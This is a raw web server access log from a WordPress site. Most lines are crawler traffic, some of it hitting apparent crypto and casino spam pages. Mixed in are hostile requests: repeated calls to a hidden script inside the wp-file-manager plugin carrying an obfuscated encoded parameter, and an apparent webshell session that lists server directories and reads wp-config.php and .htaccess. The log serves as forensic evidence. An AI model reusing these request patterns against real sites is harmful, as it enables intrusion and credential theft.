66.249.73.162 - - [26/Apr/2026:09:13:08 +0300] "GET /?detail/367858355 HTTP/1.1" 200 30398 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:09:11:09 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373436392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138333836392q6137323734643434613866393733613332333838646337326564363936356432222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:09:13:10 +0300] "GET /?detail/876751284 HTTP/1.1" 200 30465 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.241.75.248 - - [26/Apr/2026:09:13:14 +0300] "GET /unlocking-the-potential-of-atomic-wallet-a-comprehensive-guide/?path=/var/www/vhosts/miroglu.net/.cagefs/tmp/dbTemp.8eLygI HTTP/1.1" 200 6177 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
17.241.219.196 - - [26/Apr/2026:09:13:16 +0300] "GET /discover-the-power-of-bscscan-for-crypto-traders-4/?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/Requests/.htaccess&path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/Requests HTTP/1.1" 200 3785 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
142.44.228.140 - - [26/Apr/2026:09:13:17 +0300] "GET /shop/disabuse/quickscented062123302284.html HTTP/2" 200 8019 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
17.241.75.146 - - [26/Apr/2026:09:13:17 +0300] "GET /dexscreener-a-comprehensive-tool-for-traders-in-2026/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes/block-supports HTTP/1.1" 200 4845 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:09:13:24 +0300] "GET /?detail/674299670 HTTP/1.1" 200 30478 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:13:26 +0300] "GET /?detail/83089651 HTTP/1.1" 200 29223 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
17.241.75.42 - - [26/Apr/2026:09:13:29 +0300] "GET /discover-the-features-of-atomic-wallet-for-crypto-management/?path=/var/www/vhosts/miroglu.net/.cagefs/tmp/dbTemp.AdFRHN HTTP/1.1" 200 6214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
185.216.113.70 - - [26/Apr/2026:09:11:31 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373439312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138333839312q3538306263623761363836323638666438313262333339663864633630626435222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
17.246.23.34 - - [26/Apr/2026:09:13:33 +0300] "GET /revolutionary-features-of-jupiter-swap-for-traders-2/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/css HTTP/1.1" 200 7235 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:09:13:34 +0300] "GET /?detail/248125791 HTTP/1.1" 200 29534 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:13:39 +0300] "GET /shop/assurance/redtop80212510395.html HTTP/1.1" 200 30299 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
54.39.0.161 - - [26/Apr/2026:09:13:45 +0300] "GET /shop/containing/rudesheimer01378425265.html HTTP/2" 200 8039 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [26/Apr/2026:09:13:48 +0300] "GET /?detail/823561827 HTTP/1.1" 200 28850 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.96.199 - - [26/Apr/2026:09:13:51 +0300] "GET /discover-tronscan-your-essential-crypto-tracking-tool/2 HTTP/1.1" 200 10026 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:09:11:52 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373531322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138333931322q3662653032356232333436376634396637303931396230666161626334333535222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
185.216.113.70 - - [26/Apr/2026:09:12:14 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373533342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138333933342q3037336239626134306164363732356562386432343832323139633235366561222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
148.113.128.10 - - [26/Apr/2026:09:14:16 +0300] "GET /shop/betrimming/nubia06397442750.html HTTP/2" 200 8052 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
17.22.253.130 - - [26/Apr/2026:09:14:26 +0300] "GET /unlocking-the-secrets-of-casino-strategies-for-beginners-2/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes HTTP/1.1" 200 15107 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
185.216.113.70 - - [26/Apr/2026:09:12:36 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373535362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138333935362q3366333462663366663333393466303962383961353037656533306639323464222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
54.39.89.185 - - [26/Apr/2026:09:14:40 +0300] "GET /shop/township/lowbell0645657237.html HTTP/2" 200 8050 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [26/Apr/2026:09:12:58 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373537382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138333937382q3462373266376337643133306635303533393630316633356630636266383639222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.164 - - [26/Apr/2026:09:14:59 +0300] "GET /?detail/645853193 HTTP/1.1" 200 29598 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:09:15:09 +0300] "GET /shop/nimbose/mumbler711118954851.html HTTP/1.1" 200 29328 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
54.39.0.171 - - [26/Apr/2026:09:15:10 +0300] "GET /shop/nullifidian/fastidious053973754559.html HTTP/2" 200 7989 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
17.22.237.16 - - [26/Apr/2026:09:15:13 +0300] "GET /discover-how-raydium-enhances-your-crypto-trading-journey/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/js/tinymce/skins HTTP/1.1" 200 4239 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
66.249.73.162 - - [26/Apr/2026:09:15:17 +0300] "GET /?detail/277415474 HTTP/1.1" 200 28932 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:09:13:20 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373630302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138343030302q6635646366656637326630373536366633326234313462643165383336666362222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:09:15:32 +0300] "GET /?detail/579865322 HTTP/1.1" 200 29766 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.50.180.2 - - [26/Apr/2026:09:15:36 +0300] "GET /?page_id=227 HTTP/1.1" 200 8494 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:38 +0300] "GET /?path=/ HTTP/1.1" 200 5435 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:39 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/xmlrpc.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 4731 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:40 +0300] "GET /?path=/var HTTP/1.1" 200 5465 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
185.216.113.70 - - [26/Apr/2026:09:13:41 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373632312p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138343032312q6532646564383830383237333438366633623738373262396564623138396136222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
209.50.180.2 - - [26/Apr/2026:09:15:42 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-trackback.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 7274 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:43 +0300] "GET /?path=/var/www HTTP/1.1" 200 5469 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:45 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-slgnup.gz&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5463 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:46 +0300] "GET /?path=/var/www/vhosts HTTP/1.1" 200 5476 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:48 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-signup.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 13936 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:49 +0300] "GET /?path=/var/www/vhosts/miroglu.net HTTP/1.1" 200 7475 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
51.222.95.35 - - [26/Apr/2026:09:15:50 +0300] "GET /shop/molecularly/measelry052833906444.html HTTP/2" 200 8033 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.50.180.2 - - [26/Apr/2026:09:15:51 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-settings.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 10846 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:52 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 8433 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:54 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-mail.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 8515 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:56 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/.tmb HTTP/1.1" 200 8558 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:57 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-load.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 7244 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:15:58 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/c6f01 HTTP/1.1" 200 5930 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:00 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-links-opml.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6623 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:02 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/images HTTP/1.1" 200 6203 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
185.216.113.70 - - [26/Apr/2026:09:14:03 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373138373634332p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373138343034332q3032383837666364346432656164343230353033303434346437343038316439222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
209.50.180.2 - - [26/Apr/2026:09:16:03 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-cron.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5383 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:04 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/wp-admin HTTP/1.1" 200 6970 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:06 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-config.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 7129 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:08 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/wp-content HTTP/1.1" 200 3772 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:09 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-config-sample.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 26397 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:10 +0300] "GET /?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes HTTP/1.1" 200 12092 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:12 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-comments-post.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6541 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
17.241.75.201 - - [26/Apr/2026:09:16:12 +0300] "GET /discover-tronscan-your-guide-to-blockchain-insights/?path=/var/www/vhosts/miroglu.net/subdomains/serhatburke/css HTTP/1.1" 200 7237 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
209.50.180.2 - - [26/Apr/2026:09:16:14 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/.htaccess&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5549 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
17.241.227.89 - - [26/Apr/2026:09:16:15 +0300] "GET /exploring-the-hidden-strategies-of-successful-casino-players/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/js/plupload HTTP/1.1" 200 4579 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
209.50.180.2 - - [26/Apr/2026:09:16:15 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-blog-header.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5794 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:17 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/55ece37ba5f55f1032982f56b7fbfb48&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5511 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
148.113.128.184 - - [26/Apr/2026:09:16:17 +0300] "GET /shop/methodize/nagor002070887108.html HTTP/2" 200 8034 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
17.241.75.241 - - [26/Apr/2026:09:16:17 +0300] "GET /boost-your-crypto-trading-efficiency-with-raydium/?path=/var/www/vhosts/miroglu.net/.cagefs/var/lib HTTP/1.1" 200 6616 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
209.50.180.2 - - [26/Apr/2026:09:16:18 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/wp-activate.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 7998 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:19 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/admin.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 57455 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
17.241.219.49 - - [26/Apr/2026:09:16:20 +0300] "GET /discovering-raydium-the-future-of-efficient-crypto-swaps/?path=/var/www/vhosts/miroglu.net/httpdocs/wp-includes/blocks/post-featured-image HTTP/1.1" 200 4574 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
209.50.180.2 - - [26/Apr/2026:09:16:21 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/robots.txt&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 3339 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:16:22 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/buy.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6303 "https://miroglu.net/?page_id=227" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
